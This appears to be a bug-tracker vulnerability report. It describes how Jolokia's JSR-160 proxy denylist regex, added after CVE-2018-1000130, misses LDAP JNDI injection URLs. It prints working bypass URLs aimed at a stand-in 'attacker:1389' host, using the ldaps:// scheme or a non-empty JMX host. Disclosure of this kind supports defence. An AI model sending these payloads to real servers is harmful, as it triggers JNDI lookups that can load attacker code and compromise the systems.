Fedora Account System
Red Hat Associate
Red Hat Customer
Jolokia's JSR-160 proxy mode accepts a client-supplied JMX service URL (target.url in a POST body) and connects to it using JMXConnectorFactory. The fix for CVE-2018-1000130 (Jolokia 1.5.0, 2018) added a default denylist to block LDAP-based JNDI injection. That denylist consists of a single regular expression, which remains identical on both the 1.x and 2.x branches as of this writing: service:jmx:rmi:///jndi/ldap:.* Matching is performed as a full-string regex match (Pattern.compile(pattern, CASE_INSENSITIVE).matcher(url).matches()). This pattern is incomplete. At least three classes of LDAP JNDI URLs pass through the filter: Bypass 1 -- ldaps:// scheme: The pattern requires the literal substring ldap: immediately after /jndi/. The LDAP-over-TLS scheme ldaps: does not match. Bypassing URL: service:jmx:rmi:///jndi/ldaps://attacker:1389/o=ref Bypass 2 -- Non-empty JMX host in the service URL: The pattern is anchored to service:jmx:rmi:///jndi/... (three slashes, meaning the JMX host component is empty). A JMX service URL with a non-empty host such as service:jmx:rmi://localhost/jndi/ldap://... is a valid JMXServiceURL whose path is still /jndi/ldap://..., but the full string does not match the regex. Bypassing URL: service:jmx:rmi://localhost/jndi/ldap://attacker:1389/o=ref Bypassing URL: service:jmx:rmi://127.0.0.1:0/jndi/ldap://attacker:1389/o=ref All three bypass URLs parse into valid JMXServiceURL objects and, when passed to JMXConnectorFactory.newJMXConnector().connect(), trigger a JNDI lookup against the attacker-controlled endpoint. Upstream Issue: https://github.com/jolokia/jolokia/issues/1049